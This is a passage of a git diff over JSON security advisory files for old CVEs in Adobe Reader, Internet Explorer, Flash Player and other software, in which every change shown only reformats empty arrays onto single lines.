2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted use of the value attribute, a different vulnerability than CVE-2015-6685, CVE-2015-6686, CVE-2015-6693, CVE-2015-6694, and CVE-2015-7622.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vcff-m44g-82c2/GHSA-vcff-m44g-82c2.json b/advisories/unreviewed/2022/05/GHSA-vcff-m44g-82c2/GHSA-vcff-m44g-82c2.json index 0968fd8636e..0f09e9e726f 100644 --- a/advisories/unreviewed/2022/05/GHSA-vcff-m44g-82c2/GHSA-vcff-m44g-82c2.json +++ b/advisories/unreviewed/2022/05/GHSA-vcff-m44g-82c2/GHSA-vcff-m44g-82c2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vg75-g6fc-cfrr/GHSA-vg75-g6fc-cfrr.json b/advisories/unreviewed/2022/05/GHSA-vg75-g6fc-cfrr/GHSA-vg75-g6fc-cfrr.json index f7a2a72fc19..61e11ea9b69 100644 --- a/advisories/unreviewed/2022/05/GHSA-vg75-g6fc-cfrr/GHSA-vg75-g6fc-cfrr.json +++ b/advisories/unreviewed/2022/05/GHSA-vg75-g6fc-cfrr/GHSA-vg75-g6fc-cfrr.json @@ -7,12 +7,8 @@ "CVE-2011-4689" ], "details": "Microsoft Internet Explorer 6 through 9 does not prevent capture of data about the times of Same Origin Policy violations during IFRAME loading attempts, which makes it easier for remote attackers to determine whether a document exists in the browser cache via crafted JavaScript code.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-vh2f-gx8v-jhr7/GHSA-vh2f-gx8v-jhr7.json b/advisories/unreviewed/2022/05/GHSA-vh2f-gx8v-jhr7/GHSA-vh2f-gx8v-jhr7.json index ea88b068486..98a39858ba0 100644 --- a/advisories/unreviewed/2022/05/GHSA-vh2f-gx8v-jhr7/GHSA-vh2f-gx8v-jhr7.json +++ b/advisories/unreviewed/2022/05/GHSA-vh2f-gx8v-jhr7/GHSA-vh2f-gx8v-jhr7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vj6x-f6g8-6phm/GHSA-vj6x-f6g8-6phm.json b/advisories/unreviewed/2022/05/GHSA-vj6x-f6g8-6phm/GHSA-vj6x-f6g8-6phm.json index 7b9ba865534..7777f5a7a34 100644 --- a/advisories/unreviewed/2022/05/GHSA-vj6x-f6g8-6phm/GHSA-vj6x-f6g8-6phm.json +++ b/advisories/unreviewed/2022/05/GHSA-vj6x-f6g8-6phm/GHSA-vj6x-f6g8-6phm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vm75-p2wg-q736/GHSA-vm75-p2wg-q736.json b/advisories/unreviewed/2022/05/GHSA-vm75-p2wg-q736/GHSA-vm75-p2wg-q736.json index 9913c541727..6effdbc8f7b 100644 --- a/advisories/unreviewed/2022/05/GHSA-vm75-p2wg-q736/GHSA-vm75-p2wg-q736.json +++ b/advisories/unreviewed/2022/05/GHSA-vm75-p2wg-q736/GHSA-vm75-p2wg-q736.json @@ -7,12 +7,8 @@ "CVE-2014-9225" ], "details": "The ajaxswing webui in the management server in Symantec Critical System Protection (SCSP) 5.2.9 through MP6 and Symantec Data Center Security: Server Advanced (SDCS:SA) 6.0.x through 6.0 MP1 allows remote authenticated users to obtain sensitive server information via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vp6x-rh2w-5863/GHSA-vp6x-rh2w-5863.json b/advisories/unreviewed/2022/05/GHSA-vp6x-rh2w-5863/GHSA-vp6x-rh2w-5863.json index 0c31dd4a993..610778e01fd 100644 --- a/advisories/unreviewed/2022/05/GHSA-vp6x-rh2w-5863/GHSA-vp6x-rh2w-5863.json +++ b/advisories/unreviewed/2022/05/GHSA-vp6x-rh2w-5863/GHSA-vp6x-rh2w-5863.json @@ -7,12 +7,8 @@ "CVE-2012-2424" ], "details": "The intu-help-qb (aka Intuit Help System Async Pluggable Protocol) handlers in HelpAsyncPluggableProtocol.dll in Intuit QuickBooks 2009 through 2012, when Internet Explorer is used, allow remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a URI that lacks a required delimiter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-vp99-238f-wv9j/GHSA-vp99-238f-wv9j.json b/advisories/unreviewed/2022/05/GHSA-vp99-238f-wv9j/GHSA-vp99-238f-wv9j.json index 11372fbee71..b9074ed476b 100644 --- a/advisories/unreviewed/2022/05/GHSA-vp99-238f-wv9j/GHSA-vp99-238f-wv9j.json +++ b/advisories/unreviewed/2022/05/GHSA-vp99-238f-wv9j/GHSA-vp99-238f-wv9j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vq94-9f8p-793h/GHSA-vq94-9f8p-793h.json b/advisories/unreviewed/2022/05/GHSA-vq94-9f8p-793h/GHSA-vq94-9f8p-793h.json index 814978cc980..2f2865080ea 100644 --- a/advisories/unreviewed/2022/05/GHSA-vq94-9f8p-793h/GHSA-vq94-9f8p-793h.json +++ b/advisories/unreviewed/2022/05/GHSA-vq94-9f8p-793h/GHSA-vq94-9f8p-793h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vr6v-26w8-72g7/GHSA-vr6v-26w8-72g7.json b/advisories/unreviewed/2022/05/GHSA-vr6v-26w8-72g7/GHSA-vr6v-26w8-72g7.json index be2d381f221..41d287226cc 100644 --- a/advisories/unreviewed/2022/05/GHSA-vr6v-26w8-72g7/GHSA-vr6v-26w8-72g7.json +++ b/advisories/unreviewed/2022/05/GHSA-vr6v-26w8-72g7/GHSA-vr6v-26w8-72g7.json @@ -7,12 +7,8 @@ "CVE-2015-5114" ], "details": "Use-after-free vulnerability in Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-4448, CVE-2015-5095, CVE-2015-5099, CVE-2015-5101, CVE-2015-5111, and CVE-2015-5113.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vr9x-jfpj-g523/GHSA-vr9x-jfpj-g523.json b/advisories/unreviewed/2022/05/GHSA-vr9x-jfpj-g523/GHSA-vr9x-jfpj-g523.json index dfcf7d34f15..4dff6b56bb4 100644 --- a/advisories/unreviewed/2022/05/GHSA-vr9x-jfpj-g523/GHSA-vr9x-jfpj-g523.json +++ b/advisories/unreviewed/2022/05/GHSA-vr9x-jfpj-g523/GHSA-vr9x-jfpj-g523.json @@ -7,12 +7,8 @@ "CVE-2015-6697" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allow attackers to obtain sensitive information about color objects from process memory by reading a light object's RGB data, a different vulnerability than CVE-2015-6699, CVE-2015-6700, CVE-2015-6701, CVE-2015-6702, CVE-2015-6703, and CVE-2015-6704.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vvvj-gwh5-mq4g/GHSA-vvvj-gwh5-mq4g.json b/advisories/unreviewed/2022/05/GHSA-vvvj-gwh5-mq4g/GHSA-vvvj-gwh5-mq4g.json index cb622927de2..66bfc73f860 100644 --- a/advisories/unreviewed/2022/05/GHSA-vvvj-gwh5-mq4g/GHSA-vvvj-gwh5-mq4g.json +++ b/advisories/unreviewed/2022/05/GHSA-vvvj-gwh5-mq4g/GHSA-vvvj-gwh5-mq4g.json @@ -7,12 +7,8 @@ "CVE-2015-4446" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to bypass intended access restrictions and perform a transition from Low Integrity to Medium Integrity via unspecified vectors, a different vulnerability than CVE-2015-5090 and CVE-2015-5106.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vxv4-rrx9-5xfq/GHSA-vxv4-rrx9-5xfq.json b/advisories/unreviewed/2022/05/GHSA-vxv4-rrx9-5xfq/GHSA-vxv4-rrx9-5xfq.json index 8397e43b863..1293c7b7128 100644 --- a/advisories/unreviewed/2022/05/GHSA-vxv4-rrx9-5xfq/GHSA-vxv4-rrx9-5xfq.json +++ b/advisories/unreviewed/2022/05/GHSA-vxv4-rrx9-5xfq/GHSA-vxv4-rrx9-5xfq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w256-55mp-mjfh/GHSA-w256-55mp-mjfh.json b/advisories/unreviewed/2022/05/GHSA-w256-55mp-mjfh/GHSA-w256-55mp-mjfh.json index 5746e3c6a17..b8b05ded719 100644 --- a/advisories/unreviewed/2022/05/GHSA-w256-55mp-mjfh/GHSA-w256-55mp-mjfh.json +++ b/advisories/unreviewed/2022/05/GHSA-w256-55mp-mjfh/GHSA-w256-55mp-mjfh.json @@ -7,12 +7,8 @@ "CVE-2011-1713" ], "details": "Microsoft msxml.dll, as used in Internet Explorer 8 on Windows 7, allows remote attackers to obtain potentially sensitive information about heap memory addresses via an XML document containing a call to the XSLT generate-id XPath function. NOTE: this might overlap CVE-2011-1202.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w534-6frw-3r76/GHSA-w534-6frw-3r76.json b/advisories/unreviewed/2022/05/GHSA-w534-6frw-3r76/GHSA-w534-6frw-3r76.json index b9301829a94..30e74462227 100644 --- a/advisories/unreviewed/2022/05/GHSA-w534-6frw-3r76/GHSA-w534-6frw-3r76.json +++ b/advisories/unreviewed/2022/05/GHSA-w534-6frw-3r76/GHSA-w534-6frw-3r76.json @@ -7,12 +7,8 @@ "CVE-2015-1209" ], "details": "Use-after-free vulnerability in the VisibleSelection::nonBoundaryShadowTreeRootNode function in core/editing/VisibleSelection.cpp in the DOM implementation in Blink, as used in Google Chrome before 40.0.2214.111 on Windows, OS X, and Linux and before 40.0.2214.109 on Android, allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted JavaScript code that triggers improper handling of a shadow-root anchor.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w55v-4c3h-pjh8/GHSA-w55v-4c3h-pjh8.json b/advisories/unreviewed/2022/05/GHSA-w55v-4c3h-pjh8/GHSA-w55v-4c3h-pjh8.json index 4f5637d3c9b..0ee8a4a2ece 100644 --- a/advisories/unreviewed/2022/05/GHSA-w55v-4c3h-pjh8/GHSA-w55v-4c3h-pjh8.json +++ b/advisories/unreviewed/2022/05/GHSA-w55v-4c3h-pjh8/GHSA-w55v-4c3h-pjh8.json @@ -7,12 +7,8 @@ "CVE-2012-2035" ], "details": "Stack-based buffer overflow in Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X; before 10.3.183.20 and 11.x before 11.2.202.236 on Linux; before 11.1.111.10 on Android 2.x and 3.x; and before 11.1.115.9 on Android 4.x, and Adobe AIR before 3.3.0.3610, allows attackers to execute arbitrary code via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w5mr-v466-jmjm/GHSA-w5mr-v466-jmjm.json b/advisories/unreviewed/2022/05/GHSA-w5mr-v466-jmjm/GHSA-w5mr-v466-jmjm.json index be75554d357..59eec9c311c 100644 --- a/advisories/unreviewed/2022/05/GHSA-w5mr-v466-jmjm/GHSA-w5mr-v466-jmjm.json +++ b/advisories/unreviewed/2022/05/GHSA-w5mr-v466-jmjm/GHSA-w5mr-v466-jmjm.json @@ -7,12 +7,8 @@ "CVE-2012-1858" ], "details": "The toStaticHTML API (aka the SafeHTML component) in Microsoft Internet Explorer 8 and 9, Communicator 2007 R2, and Lync 2010 and 2010 Attendee does not properly handle event attributes and script, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via a crafted HTML document, aka \"HTML Sanitization Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w82c-3xvf-q542/GHSA-w82c-3xvf-q542.json b/advisories/unreviewed/2022/05/GHSA-w82c-3xvf-q542/GHSA-w82c-3xvf-q542.json index 82322165506..c1ea447e966 100644 --- a/advisories/unreviewed/2022/05/GHSA-w82c-3xvf-q542/GHSA-w82c-3xvf-q542.json +++ b/advisories/unreviewed/2022/05/GHSA-w82c-3xvf-q542/GHSA-w82c-3xvf-q542.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-w847-jx6c-6j35/GHSA-w847-jx6c-6j35.json b/advisories/unreviewed/2022/05/GHSA-w847-jx6c-6j35/GHSA-w847-jx6c-6j35.json index fb5586a07d2..57a22b95524 100644 --- a/advisories/unreviewed/2022/05/GHSA-w847-jx6c-6j35/GHSA-w847-jx6c-6j35.json +++ b/advisories/unreviewed/2022/05/GHSA-w847-jx6c-6j35/GHSA-w847-jx6c-6j35.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w8c7-26w6-xx7c/GHSA-w8c7-26w6-xx7c.json b/advisories/unreviewed/2022/05/GHSA-w8c7-26w6-xx7c/GHSA-w8c7-26w6-xx7c.json index 3aec8194702..04e4c2acf8e 100644 --- a/advisories/unreviewed/2022/05/GHSA-w8c7-26w6-xx7c/GHSA-w8c7-26w6-xx7c.json +++ b/advisories/unreviewed/2022/05/GHSA-w8c7-26w6-xx7c/GHSA-w8c7-26w6-xx7c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w9gj-prpq-pxm9/GHSA-w9gj-prpq-pxm9.json b/advisories/unreviewed/2022/05/GHSA-w9gj-prpq-pxm9/GHSA-w9gj-prpq-pxm9.json index 58679f97b2b..214c3df024c 100644 --- a/advisories/unreviewed/2022/05/GHSA-w9gj-prpq-pxm9/GHSA-w9gj-prpq-pxm9.json +++ b/advisories/unreviewed/2022/05/GHSA-w9gj-prpq-pxm9/GHSA-w9gj-prpq-pxm9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w9j2-jxm7-7f2v/GHSA-w9j2-jxm7-7f2v.json b/advisories/unreviewed/2022/05/GHSA-w9j2-jxm7-7f2v/GHSA-w9j2-jxm7-7f2v.json index 51aab4f09e5..bc985eefe99 100644 --- a/advisories/unreviewed/2022/05/GHSA-w9j2-jxm7-7f2v/GHSA-w9j2-jxm7-7f2v.json +++ b/advisories/unreviewed/2022/05/GHSA-w9j2-jxm7-7f2v/GHSA-w9j2-jxm7-7f2v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w9r3-r3v7-mcvc/GHSA-w9r3-r3v7-mcvc.json b/advisories/unreviewed/2022/05/GHSA-w9r3-r3v7-mcvc/GHSA-w9r3-r3v7-mcvc.json index 2df03969b94..bfcdf8363a3 100644 --- a/advisories/unreviewed/2022/05/GHSA-w9r3-r3v7-mcvc/GHSA-w9r3-r3v7-mcvc.json +++ b/advisories/unreviewed/2022/05/GHSA-w9r3-r3v7-mcvc/GHSA-w9r3-r3v7-mcvc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wfqp-59fc-9w82/GHSA-wfqp-59fc-9w82.json b/advisories/unreviewed/2022/05/GHSA-wfqp-59fc-9w82/GHSA-wfqp-59fc-9w82.json index 328ee8a796e..847371c875b 100644 --- a/advisories/unreviewed/2022/05/GHSA-wfqp-59fc-9w82/GHSA-wfqp-59fc-9w82.json +++ b/advisories/unreviewed/2022/05/GHSA-wfqp-59fc-9w82/GHSA-wfqp-59fc-9w82.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wfr4-p3hp-jf4v/GHSA-wfr4-p3hp-jf4v.json b/advisories/unreviewed/2022/05/GHSA-wfr4-p3hp-jf4v/GHSA-wfr4-p3hp-jf4v.json index c2cf92f7864..a59d533fbf4 100644 --- a/advisories/unreviewed/2022/05/GHSA-wfr4-p3hp-jf4v/GHSA-wfr4-p3hp-jf4v.json +++ b/advisories/unreviewed/2022/05/GHSA-wfr4-p3hp-jf4v/GHSA-wfr4-p3hp-jf4v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wfv6-vr6v-73h2/GHSA-wfv6-vr6v-73h2.json b/advisories/unreviewed/2022/05/GHSA-wfv6-vr6v-73h2/GHSA-wfv6-vr6v-73h2.json index 1c8a844a7aa..700f3c59e4e 100644 --- a/advisories/unreviewed/2022/05/GHSA-wfv6-vr6v-73h2/GHSA-wfv6-vr6v-73h2.json +++ b/advisories/unreviewed/2022/05/GHSA-wfv6-vr6v-73h2/GHSA-wfv6-vr6v-73h2.json @@ -7,12 +7,8 @@ "CVE-2011-1252" ], "details": "Cross-site scripting (XSS) vulnerability in the SafeHTML function in the toStaticHTML API in Microsoft Internet Explorer 7 and 8, Office SharePoint Server 2007 SP2, Office SharePoint Server 2010 Gold and SP1, Groove Server 2010 Gold and SP1, Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified strings, aka \"toStaticHTML Information Disclosure Vulnerability\" or \"HTML Sanitization Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-whpc-4c93-2f38/GHSA-whpc-4c93-2f38.json b/advisories/unreviewed/2022/05/GHSA-whpc-4c93-2f38/GHSA-whpc-4c93-2f38.json index 9a7ab1b3179..15e34e33abf 100644 --- a/advisories/unreviewed/2022/05/GHSA-whpc-4c93-2f38/GHSA-whpc-4c93-2f38.json +++ b/advisories/unreviewed/2022/05/GHSA-whpc-4c93-2f38/GHSA-whpc-4c93-2f38.json @@ -7,12 +7,8 @@ "CVE-2015-4450" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors, a different vulnerability than CVE-2014-8450, CVE-2015-4449, CVE-2015-5088, CVE-2015-5089, and CVE-2015-5092.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-whxr-7374-4hfx/GHSA-whxr-7374-4hfx.json b/advisories/unreviewed/2022/05/GHSA-whxr-7374-4hfx/GHSA-whxr-7374-4hfx.json index b1dea99d4de..05107c4fc25 100644 --- a/advisories/unreviewed/2022/05/GHSA-whxr-7374-4hfx/GHSA-whxr-7374-4hfx.json +++ b/advisories/unreviewed/2022/05/GHSA-whxr-7374-4hfx/GHSA-whxr-7374-4hfx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wj4x-ccxf-pr24/GHSA-wj4x-ccxf-pr24.json b/advisories/unreviewed/2022/05/GHSA-wj4x-ccxf-pr24/GHSA-wj4x-ccxf-pr24.json index 927dc6fd0f4..7b7e47f06ad 100644 --- a/advisories/unreviewed/2022/05/GHSA-wj4x-ccxf-pr24/GHSA-wj4x-ccxf-pr24.json +++ b/advisories/unreviewed/2022/05/GHSA-wj4x-ccxf-pr24/GHSA-wj4x-ccxf-pr24.json @@ -7,12 +7,8 @@ "CVE-2015-6700" ], "details": "The setBackground function in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to obtain sensitive information from process memory via invalid arguments, a different vulnerability than CVE-2015-6697, CVE-2015-6699, CVE-2015-6701, CVE-2015-6702, CVE-2015-6703, and CVE-2015-6704.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wjw8-qx38-g9m7/GHSA-wjw8-qx38-g9m7.json b/advisories/unreviewed/2022/05/GHSA-wjw8-qx38-g9m7/GHSA-wjw8-qx38-g9m7.json index 014fd32a14d..50e29a1a696 100644 --- a/advisories/unreviewed/2022/05/GHSA-wjw8-qx38-g9m7/GHSA-wjw8-qx38-g9m7.json +++ b/advisories/unreviewed/2022/05/GHSA-wjw8-qx38-g9m7/GHSA-wjw8-qx38-g9m7.json @@ -7,12 +7,8 @@ "CVE-2010-3326" ], "details": "Microsoft Internet Explorer 6 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka \"Uninitialized Memory Corruption Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wmv6-5m97-cfc8/GHSA-wmv6-5m97-cfc8.json b/advisories/unreviewed/2022/05/GHSA-wmv6-5m97-cfc8/GHSA-wmv6-5m97-cfc8.json index 080abf4da83..33041eface9 100644 --- a/advisories/unreviewed/2022/05/GHSA-wmv6-5m97-cfc8/GHSA-wmv6-5m97-cfc8.json +++ b/advisories/unreviewed/2022/05/GHSA-wmv6-5m97-cfc8/GHSA-wmv6-5m97-cfc8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-wpf6-c3rx-7xrj/GHSA-wpf6-c3rx-7xrj.json b/advisories/unreviewed/2022/05/GHSA-wpf6-c3rx-7xrj/GHSA-wpf6-c3rx-7xrj.json index 233780901fa..f4014aaf27b 100644 --- a/advisories/unreviewed/2022/05/GHSA-wpf6-c3rx-7xrj/GHSA-wpf6-c3rx-7xrj.json +++ b/advisories/unreviewed/2022/05/GHSA-wpf6-c3rx-7xrj/GHSA-wpf6-c3rx-7xrj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wpfh-pc7c-f24v/GHSA-wpfh-pc7c-f24v.json b/advisories/unreviewed/2022/05/GHSA-wpfh-pc7c-f24v/GHSA-wpfh-pc7c-f24v.json index 469d3b79ff0..67d7ad1ffa9 100644 --- a/advisories/unreviewed/2022/05/GHSA-wpfh-pc7c-f24v/GHSA-wpfh-pc7c-f24v.json +++ b/advisories/unreviewed/2022/05/GHSA-wpfh-pc7c-f24v/GHSA-wpfh-pc7c-f24v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wpgx-q62h-3583/GHSA-wpgx-q62h-3583.json b/advisories/unreviewed/2022/05/GHSA-wpgx-q62h-3583/GHSA-wpgx-q62h-3583.json index 375b7fe6b2d..36eb76b5e82 100644 --- a/advisories/unreviewed/2022/05/GHSA-wpgx-q62h-3583/GHSA-wpgx-q62h-3583.json +++ b/advisories/unreviewed/2022/05/GHSA-wpgx-q62h-3583/GHSA-wpgx-q62h-3583.json @@ -7,12 +7,8 @@ "CVE-2008-7235" ], "details": "Unspecified vulnerability in the Oracle Forms component in Oracle Application Server 10.1.2.2 and E-Business Suite 12.0.3 allows remote attackers to affect integrity via unknown vectors, aka AS04.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-wppj-c8xm-mrjf/GHSA-wppj-c8xm-mrjf.json b/advisories/unreviewed/2022/05/GHSA-wppj-c8xm-mrjf/GHSA-wppj-c8xm-mrjf.json index bbcd6a828c0..526d8b112f0 100644 --- a/advisories/unreviewed/2022/05/GHSA-wppj-c8xm-mrjf/GHSA-wppj-c8xm-mrjf.json +++ b/advisories/unreviewed/2022/05/GHSA-wppj-c8xm-mrjf/GHSA-wppj-c8xm-mrjf.json @@ -7,12 +7,8 @@ "CVE-2015-5093" ], "details": "Buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wqc4-x896-47jm/GHSA-wqc4-x896-47jm.json b/advisories/unreviewed/2022/05/GHSA-wqc4-x896-47jm/GHSA-wqc4-x896-47jm.json index b0787700429..8a002df22af 100644 --- 